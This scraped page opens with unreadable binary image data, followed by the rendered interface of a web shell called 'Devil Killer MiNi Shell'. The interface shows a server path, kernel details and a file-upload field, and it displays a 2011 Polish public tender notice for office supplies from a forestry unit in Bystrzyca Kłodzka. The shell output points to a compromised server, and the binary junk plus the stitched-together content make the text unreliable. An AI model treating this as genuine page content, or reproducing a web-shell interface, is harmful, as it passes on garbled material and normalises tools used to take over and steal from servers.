JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111220/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111220/338511-N-2011.html

<p class="kh_header"><b>Bystrzyca Kłodzka: Dostawa papieru i materiałów biurowych w 2012 roku</b><br>
<b>Numer ogłoszenia: 338511 - 2011; data zamieszczenia: 20.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Usług Leśnych , ul. Nadbrzeźna 11, 57-500 Bystrzyca Kłodzka, woj. dolnośląskie, tel. 074 8110415, faks 074 8111561.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wroclaw.lasv.gov.pl/zul_w_bystrzycy_klo</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Lasów Państwowych.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa papieru i materiałów biurowych w 2012 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> LP.	NAZWA			J.M.	
I. ARCHIWIZACJA -SEGRAGATORY, TECZKI, SKOROSZYTY ITP. 					Suma
segregator - z mechanizmem dźwigowym, wykonany z kartonu pokrytego z zewnatrz poliolefiną lub polipropylenem, dolna krawędz wzmocnona metalową szyną					
1	segregator A4, 2-ringowy, szer. grzbietu 75 mm			szt.	1411
2	segregator A4, 2-ringowy, szer. grzbietu 50 mm			szt.	640
3	segregator A5, 2-ringowy, szer.grzbietu 35 mm			szt.	61
4	przekadki do segregatora A4, kartonowe o gramaturze 160g/m2 z laminowanymi indeksami 10 kolorów			komplet	53
5	przekadki do segregatora A4, kartonowe o gramaturze 240 g/m2 z laminowanymi indeksami 12 kolorów			komplet	111
6	koszulki na dokumenty A4 -pakowane po 100 szt. 			opakowanie	214
7	koszulki na dokumenty A4 z klapką boczną -pakowane po 25 szt. 			opakowanie	36
8	koszulki na dokumenty A4 na suwak -pakowane po 10 szt. 			opakowanie	19
9	koszulki na dokumenty A4 szerokie, mieszczące do 100 kartek                    -pakowane po 25 szt. 			opakowanie	21
10	teczka kartonowa o gramaturze 250g/m3 wiązana format A4 -kolor biały 			szt.	2336
11	teczka kartonowa z gumką A4, gramatura 250g/m2			szt.	422
12	teczka kartonowa z gumką A4 lakierowana, gramatura 250 g/m2			szt.	232
13	teczka plastikowa z gumką			szt.	67
14	teczka plastikowa z gumką o szerokości grzbietu 20 mm			szt.	27
15	teczka skrzydłowa na rzepy A4, wykonana z kartonu, lakierowana			szt.	92
16	teczka skrzydłowa na gumkę A4, wykonana z kartonu, lakierowana, szerokość grzbietu ok. 15 mm			szt.	12
18	teczka z rączką, wykonana z kartonu o szerokości grzbietu 50 mm, lakierowana			szt.	37
19	teczka do podpisu z 20 przekładkami, bardzo sztywna			szt.	17
20	teczka harmonijkowa z przegródkami -20 przekładek  wykonana z kartonu, do przechowywania i transportu dokumentów			szt.	9
22	teczka tekturowa akta osobowe, z szerokim grzbietem, wpinana, wewnątrz z przekładkami			szt.	26
23	skoroszyt plastikowy, tylna okładka kolorowa, przednia przezroczysta, wpinany			szt.	3137
24	skoroszyt plastikowy, tylna okadka kolorowa, przednia przezroczysta, niewpinany			szt.	142
25	skoroszyt kartonowy o gramaturze 250 g/m2 niewpinany			szt.	80
26	skoroszyt kartonowy o gramaturze 250g/m2  wpinany         			szt.	2365
27	skoroszyt kartonowy o gramaturze 250g/m2  wpinany oczko         			szt.	1272
28	skoroszyt kartonowy o garmaturze 250g/m2, wpinany połówka			szt.	540
29	etykiety standardowe na arkuszu A4 -pakowane po 100 arkuszy  105x37 mm			opakowanie	4
30	szuflada na dokumenty, plastikowa na dokumenty formatu A4			szt.	68
31	skoroszyt kartonowy o gramaturze 250 g/m2, wpinany połówka  			szt.	1205
32	teczka kopertowa A4 z plastiku na zatrzask typu EAGLE lub równoważna			szt.	90
33	skoroszyt tekturowy z fałdą niewpinany			szt.	10
34	ofertówka przezroczysta A 4			szt.	146
35	Koszulki na dok. z oknem pergaminowym color pastelowy 200szt po 40szt koloru				 
	biały, żółty, czerwony, zielony,niebieski				2
36	obwoluta z klapą boczną A4-op.10szt.                               			opakowanie	42
37	przekładki do segregatora 1/3-50kart w opakowaniu 			opakowanie	23
38	Teczka kartonowa o gramaturze 250g/m3 wiązana  format A3			szt	5
39	pojemnik na dokumenty wykonany z kartonu do przechowywania różnego rodzaju 				 
	dokumentów formatu A4 wymiwry 310x250x70			szt	3
40	pojemnik na dokumenty wykonany z plastiku do przechowywania różnego rodzaju 				 
	dokumentów formatu A4 wymiwry 310x250x70			szt	37
41	Skoroszyt plastikowy z klipsem			szt	20
42	Segregator A4,2-ringowy,szer.grzbietu 35mm			szt	63
43	Etykiety standardowe na arkuszu A4 -pakowane po 100 arkuszy  			opakowanie	2
44	fastykuły			opakowanie	5
II. ZESZYTY I BLOKI					 
1	bloki klejone, w kratke A4/100 kartkowy, gramatura 80g/m2			szt.	172
2	bloki klejone, w kratke A5/100 kartkowy, gramatura 80g/m2			szt.	103
3	bloki klejone z perforacją A4/100 kartkowy, gramatura 80g/m2			szt.	8
4	bloki klejone z perforacją A5/100 kartkowy, gramatura 80g/m2			szt.	8
5	bloki klejone z możliwością wpięcia do segregatora A4/100 kartkowy			szt.	23
6	teczka z klipem - klip utrzymujący ok.100 kartek, wykonany z tworzywa PCV i sztywnej tektury, z uchwytem na długopis			szt.	22
7	brulion A4/96 kartkowy, gramatura 80g/m2, okładka twarda			szt.	91
8	brulion A5/96 kartkowy, gramatura 80g/m2, okładka miękka			szt.	10
9	brulion A5/96 kartkowy, gramatura 80g/m2, okładka twarda			szt.	32
10	zeszyt A5/60 kartkowy, gramatura 80 g/m2, okładka miękka			szt.	68
11	notatnik teleadresowy A4 80 kartkowy			szt.	11
12	dziennik korespondencyjny -podawczy  A4/96 kartkowy			szt.	49
13	kostka samoprzylepne 76 x 76 mm			szt.	195
14	kostka samoprzylepna 38 x 51 mm			szt.	611
15	kostka samoprzylepna 76 x 50 mm			szt.	366
16	kostka samoprzylepna 76 x 127 mm			szt.	52
17	kostka - notes klejona na jednym boku 80 x 80 mm			szt.	80
18	kostka - notes klejona na jednym boku 85 x 85 mm			szt.	105
19	plastikowy pojemnik z wkładem 90 x 90 x 90 mm			szt.	16
20	notes - kostka nieklejona -wkład do pojemnika 90 x 90 x 90 mm 			szt.	32
21	zeszyt 16-kartkowy w kratkę                                                    			szt.	83
22	blok z makulatury w kratkę A6                                           			blok	18
23	okładka raportu dyspozycyjnego -regulowana                        			szt	5
24	Dziennik korespondencyjny -podawczy  92 kartkowy			szt	6
25	blok - kalka ołówkowa A4/100 kartek			blok	6
26	Dziennik podawczy 196 str.			szt	7
27	blok-kalka kleślarska A4/100kartkowy,gramatura 70/75			szt	1
III. PAPIER					 
1	papier A4 do wszelkiego rodzaju urządzeń biurowych, odpowiedni do dużych nakładów, nie pylący, gramatura 80 g/m2, białość 166 wg skali białości CIE -ryza 500 arkuszy 			ryza	1820
2	papier A4 do wszelkiego rodzaju urządzeń biurowych, odpowiedni do dużych nakładów, nie pylący, gramatura 80 g/m2, białość 146 wg skali białości CIE -ryza 500 arkuszy 			ryza	700
3	papier A4 do wszelkiego rodzaju urządzeń biurowych, odpowiedni do dużych nakładów, nie pylący, gramatura 80 g/m2, białość 161 wg skali białości CIE -ryza 500 arkuszy 			ryza	1100
4	papier A3 do wszelkiego rodzaju urządzeń biurowych, odpowiedni do dużych nakładów, nie pylący, gramatura 80 g/m2, białość 166 wg skali białości CIE -ryza 500 arkuszy 			ryza	9
5	papier A3 do wszelkiego rodzaju urządzeń biurowych, odpowiedni do dużych nakładów, nie pylący, gramatura 80 g/m2, białość 161 wg skali białości CIE -ryza 500 arkuszy 			ryza	45
6	papier kancelaryjny w kratkę A3 gramatura 60 g/m2 - ryza 500 arkuszy 			ryza	3
7	papier wizytówkowy A4, gramatura 220 g/m2 - 100 arkuszy w opakowaniu 			opakowanie	7
8	papier do drukowania fotografii, błyszczący, gramatura 127 -20 kartek w opakowaniu 			arkusz	20
IV. DRUKI					 
1	KP - format A6, 80 kartek			blok	191
2	KW - format A6, 80 kartek			blok	56
3	RW A5, M-8			blok	55
4	MM 15 - pozycyjne			blok	21
6	PZ 1/3 A3			blok	30
7	PZ typ 362-2			blok	25
8	nota odsetkowa			blok	3
9	wezwanie do zapłaty			blok	6
10	rozliczenie zaliczki			blok	23
11	raport kasowy A4			blok	15
12	raport kasowy A5			blok	21
13	Delegacje krajowe                                                                  			blok	57
14	MM 5-pozycyjne                                                                    			blok	7
15	wniosek urlopowy                                                                                     			blok	35
16	karta urlopowa                                                                                      			blok	67
17	polecenie księgowania                                                          			blok	2
18	polecenie księgowania A-5                                                      			blok	20
19	Raport dyspozytorski                                                             			blok	21
20	Wz duży 1/3 A3 M-2			blok	10
21	Wz M-2 			blok	5
V.PAPIER DO DRUKAREK IGŁOWYCH,ROLKI DO FAKSÓW I KAS					 
1	rolki do faksu			rolki	46
2	rolki do drukarek do rejestratorów 110 mm			rolki	180
3	rolki do kas fiskalnych 57mmx25mm			rolki	126
4	rolki do kalkulatora 57mm/20m			szt	12
5	rolka do faksu 210x30 -opakowanie 6 rolek 			opakowanie	3
6	papier rolka do rejestratorów PSION termiczny			rolki	190
7	rolki do drukarek rejestrów 110x30 termoczułe                        			rolki	360
8	Papier do Plotera 610-50m			rolki	4
VI.KOPERTY I AKCESORIA DO WYSYŁEK					 
1	koperty C-6 białe, samoklejące -1000 szt. w kartonie 			karton	10
2	koperty C-6 białe z okienkiem po prawej stronie, samoklejące -1000 szt. w kartonie 			karton	4
4	koperty 110x220białe z okienkiem po prawej stronie, samoklejące -1000szt.w kartonie 			karton	22
5	koperty C-5 białe, samoklejące -500 sztuk w kartonie 			karton	26
6	Koperty C-5,białe z okienkiem po prawej stronie samoklejące -500szt.w kartonie 			karton	5
7	koperty C-4 białe, samoklejące -500 sztuk w kartonie 			karton	15
8	koperty C-4 białe, z okienkiem po prawej stronie samoklejące -500 szt. w kartonie 			karton	2
9	koperty B-4 białe, samoklejące -250 sztuk w kartonie 			karton	15
10	koperty B-5 białe, samoklejące -500 sztuk w kartonie 			karton	19
11	koperty z folią bąbelkową 130x170 mm -10 sztuk w opakowaniu 			opakowanie	16
12	koperty z folią bąbelkową 240x340 mm -10 sztuk w opakowaniu 			opakowanie	20
13	koperty z folią bąbelkową 370x480 mm -10 sztuk w opakowaniu 			opakowanie	21
14	koperty z rozszerzanym dnem i bokami, samoklejące z paskiem C-4 			szt.	270
15	koperty z rozszerzanym dnem i bokami, samoklejące z paskiem B-4-op 10szt 			szt.	113
16	papier pakowy w rolce 100 cm x 10 m			rolka	10
17	jutowy sznurek pakowy 3 dkg			szt.	6
18	taśma pakowa brązowa 66 m x 50mm do ciężkich pakunków			szt.	126
19	taśma pakowa przezroczysta 66m x 50mm			szt.	11
20	folia pakowa przeźroczysta 40 mic x 200 m x 450 mm typu Stretch lub równoważna			rolka	6
21	reklamówki 42 x 12,5 x 80 cm -opakowanie 100 sztuk 			opakowanie	50
22	reklamówki 30 x 8 x 55 cm -opakowanie 100 sztuk 			opakowanie	32
23	koperty do CD			szt.	275
24	koperty z folią bąbelkową A3                                              			szt.	100
25	Taśma barwiąca IR 40-T			szt	10
26	Koperty  A4			szt	300
VII. AKCESORIA BIUROWE					 
1	tasma klejąca przezroczysta 19mm x 33m			szt.	73
2	tasma klejąca przezroczysta 24mm x 30m			szt.	52
3	taśma klejąca typu Schotch magic w pudełku lub równoważna			szt.	24
4	klej w sztyfcie 20g			szt.	75
5	klej w płynie typu Pentel ERB-50 lub równoważny			szt.	17
6	klej biurowy w tubce 40 ml			szt.	5
7	spinacze okrągłe 28 mm -100 sztuk w opakowaniu 			opakowanie	386
8	spinacze okrągłe 50 mm -100 sztuk w opakowaniu 			opakowanie	78
9	spinacze trójkątne 28 mm -100 sztuk w opakowaniu 			opakowanie	78
10	spinacze trójkątne 31 mm -100 sztuk w opakowaniu 			opakowanie	133
11	pinezki kolorowe -100 sztuk w opakowaniu 			opakowanie	37
12	pinezki srebrne -100 sztuk w opakowaniu 			opakowanie	13
13	nożyczki ogólnego zastosowania 21 cm			szt.	44
14	dziurkacz, jednorazowo dziurkuje 30 kartek			szt.	26
15	dziurkacz, jednorazowo dziurkuje 70 kartek			szt.	18
16	zszywacz na zszywki 24/6 i 26/6, zszywa jednorazowo do 30 kartek			szt.	46
17	zszywacz na zszywki 23/6, 23/8, 23/10 , zszywa jednorazowo do 70 kartek			szt.	24
18	rozszywacz			szt.	51
19	zszywki 24/6 -opakowanie 1000 sztuk 			opakowanie	353
20	zszywki 23/6 -opakowanie 1000 sztuk 			opakowanie	3
21	zszywki 23/10 -opakowanie 1000 sztuk 			opakowanie	18
22	zszywki 23/15 -opakowanie 1000 sztuk 			opakowanie	6
23	linijka wykonana z przezroczystego plastiku 20 cm			szt.	19
24	linijka wykonana z przezroczystego plastiku 30 cm			szt.	41
25	linijka wykonana z przezroczystego plastiku 30 cm z uchwytem			szt.	8
26	maczałka - gąbka do nasączenia wodą			szt.	9
27	poduszka do stempli 70 x 110 mm			szt.	6
28	poduszka do stemli 90 x 160 mm			szt.	5
29	tusz do stempli uniwersalny, pojemność 25 ml, kolor zielony			szt.	86
30	temperówka wykonana ze stopu magnezu dwuotworowa			szt.	17
31	temperówka wykonana ze stopu magnezu pojedyncza			szt.	40
32	temperówka wykonana ze stopu magnezu			szt.	12
33	gumka do mazania z tworzywa sztucznego typu Pelikan lub równoważna			szt.	49
34	gumka do mazania 			szt.	23
35	gumka do mazania typu Factis S-20			szt.	28
36	podkładka na biurko z kalendarzem, wymiary 600 x 400 mm			szt.	20
37	podkładka na biurko plastikowa 530 x 630			szt.	7
38	tablica korkowa w ramie 60 x 90 cm			szt.	2
39	zszywki10/6 -opakowanie 1000 szt 			opakowanie	27
40	wizytownik na 96 wizytówek, okładka wykonana z winylu, 25 koszulek			szt.	4
41	pojemnik magnetyczny ze spinaczami metalowymi 26 mm			szt.	13
42	nawilżacz do palców glicerynowy			szt.	2
43	koszulki na CD pojedyncze			szt.	350
44	spinacze klip -do banknotów  19 mm -60 szt. w pudełku 			pudełko	30
45	spinacze klip -do banknotów  25 mm -30 szt. w pudełku 			pudełko	57
46	spinacze klip -dp banknotów  32 mm -20 szt. w pudełku 			pudełko	33
47	spinacze klip -do banknotów  41 mm -10 szt. w pudełku 			pudełko	26
48	grzbiety plastikowe, wsuwane do spinania kartek			szt.	160
49	naklejki na segregatory naklejane - duże                            			szt.	270
50	zszywki 24/8+rapid			opakowanie	59
51	Kpl.linijek -2 ekierki,kątomierz,linijka 30cm 			kpl.	4
52	etykiety do segregatorów			szt.	385
53	Przybornik na biurko			szt	2
54	Igła do archiwizacji			szt	6
55	Magnesy do tablic			kpl.	1
56	Zakładki memo			szt	15
VIII. ARTYKUŁY DO PISANIA I KORYGOWANIA					 
1	cienkopis z końcówką o grubości 0,4 mm oprawioną w metal typu Stabilo lub równoważny			szt.	172
2	cienkopis z końcówką o grubości 0,4 mm oprawioną w metal typu UB-104 lub równoważny			szt.	133
3	ołówek z gumką HB -opakowanie 12 sztuk  typu Stabilo lub równoważny			opakowanie	105
4	ołówek automatyczny z gumką 0,5 mm typu Pilot lub równoważny			szt.	40
5	ołówek automatyczny z gumką 0,7 mm typu Pilot lub równoważny			szt.	72
6	rysiki do ołówka automatycznego 0,5 mm			szt.	16
7	rysiki do ołówka automatycznego 0,7 mm			szt.	26
8	rysiki do ołówka automatycznego 0,7 mm Pentel HB			szt.	10
9	długopis żelowy typu HANDY lub równoważny -opakowanie 12 sztuk 			opakowanie	134
10	wkład do długopisu żelowego HANDY -opakowanie 12 sztuk  			opakowanie	149
11	długopis z końcówką 0,7 mm			szt.	87
12	korektor w piórze, szybkoschnący, z metalową końcówką, pojemniość 12 ml typu Handy lub równoważny			szt.	107
13	korektor w piórze, szybkoschnący, z metalową końcówką, pojemniość 8 ml typu Handy lub równoważny			szt.	36
14	korektor w płynie z pędzelkiem, szybkoschnący, pojemność 20 ml typu TIPP-EX lub równoważny			szt.	8
15	korektor w taśmie, długość taśmy ok. 6 m, szerokość ok. 4,2 mm typu Pritt Mini lub równoważny			szt.	50
16	zakreślacze typu Stabilo Boss lub równoważny			szt.	136
17	zakreślacze - komplet 5 kolorów typu Stabilo Boss lub równoważny			komplet	93
18	marker uniwersalny o grubości linii 1,0 - 5,0 mm typu Pilot lub równoważny			szt.	59
19	marker uniwersalny o grubości linii 1,5 - 3,0 mm typu Pilot lub równoważny			szt.	65
20	marker do opisywanie płyt CD			szt.	57
21	foliopis			szt.	23
22	marker suchościeralny			szt.	28
23	flamastry - komplet 12 kolorów			komplet	30
24	kredki - komplet 12 kolorów			komplet	8
25	długopis Zenith lub równoważny			szt.	332
31	wkład do długopisa Zenith niebieski			opakowanie	234
32	wkład do długopisu Zenith - op. 150sztuk 			opakowanie	88
33	cienkopis STABILO lub równoważny			szt.	37
34	cienkopis PILOT lub równoważny			szt.	43
35	cienkopis PILOT lub równoważny -kolor czarny			szt.	24
36	wkład do pióra Parker niebieski 			opakowanie	10
37	pióro typu Reynolds NK-BALL5 kulkowe niebieskie lub równoważne			szt.	1
38	cienkopis Uni ball zielony                                                        			szt.	39
39	cienkopis Uni ball czerwony                                                                   			szt.	46
40	cinkopis Uni ball czarny                                                             			szt.	66
41	długopis Pentel BK-77                                                                    			szt.	65
42	Długopis Uni ball SIGNO                                                                    			szt.	40
43	Wkład do Uni ball SIGNO 			szt.	80
44	Wkład do Uni ball SIGNO - zielony                                                          			szt.	26
45	Wkład do Uni ball SIGNO - czerwony                                                           			szt.	26
46	Wkład do Uni ball SIGNO - czarny                                                           			szt.	42
47	pióro kulkowe UB-200                                                              			szt.	47
48	wkład 0,5 do PilotaG2                                                                      			szt.	102
49	długopis żelowy 0,5mm typu Pilot G2			szt.	61
50	pióra kulkowe typu UB-150 Blue UNI-BALL lub równoważne eye micro			szt.	134
51	Rysiki do ołówka automatycznego 0,5mm Pentel HB			szt	52
52	Rapitografy0,18 0,25 0,35 0,50 0,70			kpl.	2
53	Tusze do rapitografów -różne kolory  kpl.5kolorów			kpl.	1
54	Długopiso-ołówek			szt	5
55	Pióra kulkowe Pilot V5HI-TECPOINT-czerwony			szt	24
56	Pióra kulkowe Pilot V5HI-TECPOINT-czarny			szt	12
IX. MATERIAŁY DO BINDOWANIA					 
1	okładki do bindowania przezroczyste PCV -opakowanie 100 sztuk 			opakowanie	16
2	okładki skóropodobne, wykonane z tektury o gramaturze ok. 270g/m2 -opakowanie 100 sztuk 			opakowanie	19
3	grzbiety do bindowania nr 6 -opakowanie 100 sztuk 			opakowanie	4
4	grzbiety do bindowania nr 8 -opakowanie 100 sztuk 			opakowanie	6
5	grzbiety do bindowania nr 10 -opakowanie 100 sztuk 			opakowanie	7
6	grzbiety do bindowania nr 12,5 -opakowanie 100 sztuk 			opakowanie	7
7	grzbiety do bindowania nr 16 -opakowanie 100 sztuk 			opakowanie	4
8	grzbiety do bindowania nr 20 -opakowanie 100 sztuk 			opakowanie	2
9	grzbiety do bindowania nr 25 -opakowanie  50 sztuk 			opakowanie	2
X. AKCESORIA KOMPUTEROWE					 
1	dyskietki 3,5 -opakowanie 10 sztuk 			opakowanie	1
2	płyty CD-R pojemność 700 MB -opakowanie 10 sztuk 			opakowanie	69
3	płyty CD-RW pojemność 700 MB -opakowanie 10 sztuk 			opakowanie	10
4	płyty CD-RW pojemność 700 MB -w tubie 25 sztuk 			tuba	10
5	pudełko na 40 płyt CD			szt.	2
6	antystatyczny spray do czyszczenia, pojemność 125 ml			szt.	62
7	ściereczki do czyszczenia monitorów, do wszystkich typów ekranów -w pojemniku 100 sztuk 			opakowanie	44
8	pamięć przenośna 1024 MB			szt.	7
9	płyty DVD typu Sony lub równoważne			szt.	410
10	sprężone powietrze w puszce 40ml			szt.	57
11	Płyty DVD  RW			szt.	80
12	PEN DRIVE USB 16 GB			szt	2
13	PEN DRIVE USB 64 GB			szt	4
14	PEN DRIVE USB 4 GB			szt	4
XI. MASZYNY BIUROWE*					 
1	kalkulator typu Citizen lub równoważny CT-500	b równoważny		szt.	17
2	niszczarka			szt.	7
3	Numerator			szt	4
* niszczarki, kalkulatory, telefony, telefaksy, drukarki, dyktafony, urządzenia wielofunkcyjne					 
XI. ARTYKUŁY HIGIENICZNE					 
1	rolka kuchenna, dwuwarstwowa, gramatura 2 x 22 g/m2 -opakowanie 2 rolki 			opakowanie	80
2	papier toaletowy, dwuwarstwowy, gramatura 2 x 20 g/m2, długość rolki 28 m -opakowanie 8 rolek 			opakowanie	40
3	ręczniki papierowe - składanka			karton	30
4	papier składanka - op. 4000 szt. -20 bund po 200 listków białe			opakowanie	6
5	papier toaletowy dwuwarstwowy śrenica 19 cm -opakowanie 12 szt. 			opakowanie	10
					 
		XII. ARTYKUŁY  DODATKOWE			 
1	Worki na śmieci 35l -r0lka 50szt 			szt	50
2	Worki na śmieci 60l. -rolka 50szt 			szt	50
3	Worki na odpady  120l-rolka                                                 			szt	3.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>20 % zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.30-1, 22.80.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przetargu mogą wziąć udział wykonawcy spełniający warunki określone w art. 22 ust 1 ustawy z dnia 29 stycznia 2004 r.  Prawo zamówień publicznych tzn:
1.         posiadają uprawnienia( Dz. U. z 2007 r. nr 223 ,poz. 1655 i z 2008 r. nr 171, poz. 1058 , Nr 220, poz.1420 i Nr 227 , poz. 1505 oraz z 2009 r. Nr 10 , poz. 101 , Nr 65 , poz. 545 , Nr 91 , poz. 742 , Nr 157 , poz. 1241 , Nr 206 , poz. 1591 i 223 , poz. 1778 z póź. zmian. )
            do wykonywania określonej działalności lub czynności, jeżeli ustawy  nakładają obowiązek posiadania takich uprawnień; 
2.	  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym
i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3.	  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
